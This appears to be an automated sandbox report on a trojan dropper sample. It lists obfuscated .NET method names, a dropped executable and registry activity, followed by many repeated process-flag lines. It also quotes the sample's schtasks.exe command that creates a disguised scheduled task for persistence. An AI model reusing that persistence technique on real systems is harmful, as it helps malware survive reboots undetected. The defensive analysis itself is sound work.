                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, ucjHfk79IPepqgpRcTQ.csHigh entropy of concatenated method names: 'V8uFLm042L', 'pJlFR0AQHq', 'Jb4FmWNoe8', 'cNtFZnWRsj', 'GkOFjFT8fc', 'SgYFAuwIfh', 'pPCFMxmAbZ', 'nUCF6CJsBa', 'QqQFILMLWI', 'RthFEpBDSl'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, jpP0MPQKGnWLR9ELRl.csHigh entropy of concatenated method names: 'Ba0B9EYWxs', 'LnlBHfIqr5', 'pWoyQoTuX4', 'kt7yXwPMUy', 'aSpBURVU8x', 'c7ZB8AhIiX', 'C47BNEww6x', 'knvBkoD3JQ', 'O61B1jX1xs', 'q4QBeWTQyY'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, GC2uDedh9rNcspPw30.csHigh entropy of concatenated method names: 'PcZhL7HOi1', 'D9JhRI1cfK', 'JJIhmF8rqy', 'K30hZ1O0QC', 'tp3hjqy3uE', 'EmShAJKOo3', 'y6VhMEJPkd', 'mCoh6S00KI', 'BKChIDeUBq', 'en5hEbaTUC'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile created: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp"
                    Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
